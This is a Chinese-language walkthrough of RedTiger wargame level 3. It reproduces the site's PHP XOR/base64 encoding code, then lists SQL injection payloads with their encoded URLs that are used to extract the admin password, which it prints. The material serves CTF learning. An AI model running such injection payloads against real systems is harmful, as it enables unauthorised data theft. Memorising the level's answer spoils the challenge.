• level 3


    题目给出user为Admin,目标为获取Admin的密码

    点开TheCow和Admin发现usr参数可能为某种加密

    http://redtiger.labs.overthewire.org/level3.php?usr=MDQyMjExMDE0MTgyMTQw 解不出

    看了网上大佬的WP发现是利用数组显示错误信息

    usr[]=MDYzMjIzMDA2MTU2MTQxMjU0
    Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 26

    下载urlcrypt.inc文件

    <?php
    
        // warning! ugly code ahead :)
              
        function encrypt($str)
        {
            $cryptedstr = "";
            srand(3284724);
            for ($i =0; $i < strlen($str); $i++)
            {
                $temp = ord(substr($str,$i,1)) ^ rand(0, 255);
                
                while(strlen($temp)<3)
                {
                    $temp = "0".$temp;
                }
                $cryptedstr .= $temp. "";
            }
            return base64_encode($cryptedstr);
        }
      
        function decrypt ($str)
        {
            srand(3284724);
            if(preg_match('%^[a-zA-Z0-9/+]*={0,2}$%',$str))
            {
                $str = base64_decode($str);
                if ($str != "" && $str != null && $str != false)
                {
                    $decStr = "";
                    
                    for ($i=0; $i < strlen($str); $i+=3)
                    {
                        $array[$i/3] = substr($str,$i,3);
                    }
    
                    foreach($array as $s)
                    {
                        $a = $s ^ rand(0, 255);
                        $decStr .= chr($a);
                    }
                    
                    return $decStr;
                }
                return false;
            }
            return false;
        }
    
    
    
    
        
    ?>

     这里通过对传入的参数进行了规则加密,因此可以通过构造语句之后再经过加密进行求解

    Admin' order by 7-- +
    加密后为:
    https://redtiger.labs.overthewire.org/level3.php?usr=MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMyMDc2MTc2MDc0MDM4
    1' union select 1,2,3,4,5,6,7#
    加密后为:
    https://redtiger.labs.overthewire.org/level3.php?usr=MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MTc1MDcwMDYyMTk5MjM1MjE5MDgxMjQ2MTUyMjA4MTc4M
    ' union select 1,password,2,3,4,5,6 from level3_users where username='Admin
    加密后 MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDE3MjUyMDI1MTI2MTU2MTc2MTMzMDAwMjQ2MTU2MjA4MTgyMDk2MTI5MjIwMDQ5MDUyMjMwMTk4MTk2MTg5MTEzMDQxMjQwMTQ0MDM2MTQwMTY5MTcyMDgzMjQ0MDg3MTQxMTE1MDY2MTUzMjE0MDk1MDM4MTgxMTY1MDQ3MTE4MDg2MTQwMDM0MDg1MTE4MTE4MDk5MjIyMjE4MDEwMTkwMjIwMDcxMDQwMjIw

    得到password

    thisisaverysecurepasswordEEE5rt

    Admin登录

    参考地址:https://www.jianshu.com/p/84d543cff8c0

  • 相关阅读:
    idea修改代码没法实时编译终极解决方案
    linux 安装 hadoop
    linux克隆虚拟机后需要修改的点
    多线程第一篇
    windows搭建ftp环境
    第8章PostGIS参考
    postgis 简单应用
    linux 安装postgresql
    复杂度分析(下)
    复杂度分析(上)
  • 原文地址:https://www.cnblogs.com/xiaobai141/p/14130077.html
Copyright © 2020-2023  润新知